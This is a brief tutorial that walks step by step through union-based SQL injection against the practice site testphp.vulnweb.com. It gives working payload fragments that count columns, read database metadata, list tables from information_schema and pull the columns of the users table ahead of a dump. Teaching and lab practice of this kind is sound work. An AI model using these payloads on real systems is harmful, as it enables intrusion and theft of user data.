Step by Step Sql Injection
Description : SQL Injection is a technique that misuses security holes in the database layer of an application. This gap occurs when the input from the user is not filtered correctly, for example, the username column should only be filled with letters or numbers but instead filled with other characters (such as: — = ‘) so that the attacker uses the gap by entering queries from SQL.
SQL Injection has always been the most favorite attack technique for hackers from year to year, besides being increasingly difficult for hackers to carry out network attacks caused by increasingly sophisticated defense devices from targets (eg firewalls, IDS, UTM, etc.), SQL Injection as well. very easy to do because there are still many web programmers who are still not “aware” of it.
Target : http://testphp.vulnweb.com/listproducts.php?cat=1
First step search error in database using add -’ in url.
Next step search number of look for the amount of data sequentially using query order by.
the amount of data that is not 12 means the range 11.
now we combine all the tables using union, the purpose is to extract the magic numbers that are in the database.
Now you can see database nama using query database().
Database version using query version().
Database user using query user().
Now you can search table name using query union select 1,2,3,4,5,6,7,8,9,10,group_concat(table_name) from information_schema.tables where table_schema=database() —
Column name in database using query union select 1,2,3,4,5,6,7,8,9,10,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 —
Now you can dump database in table user.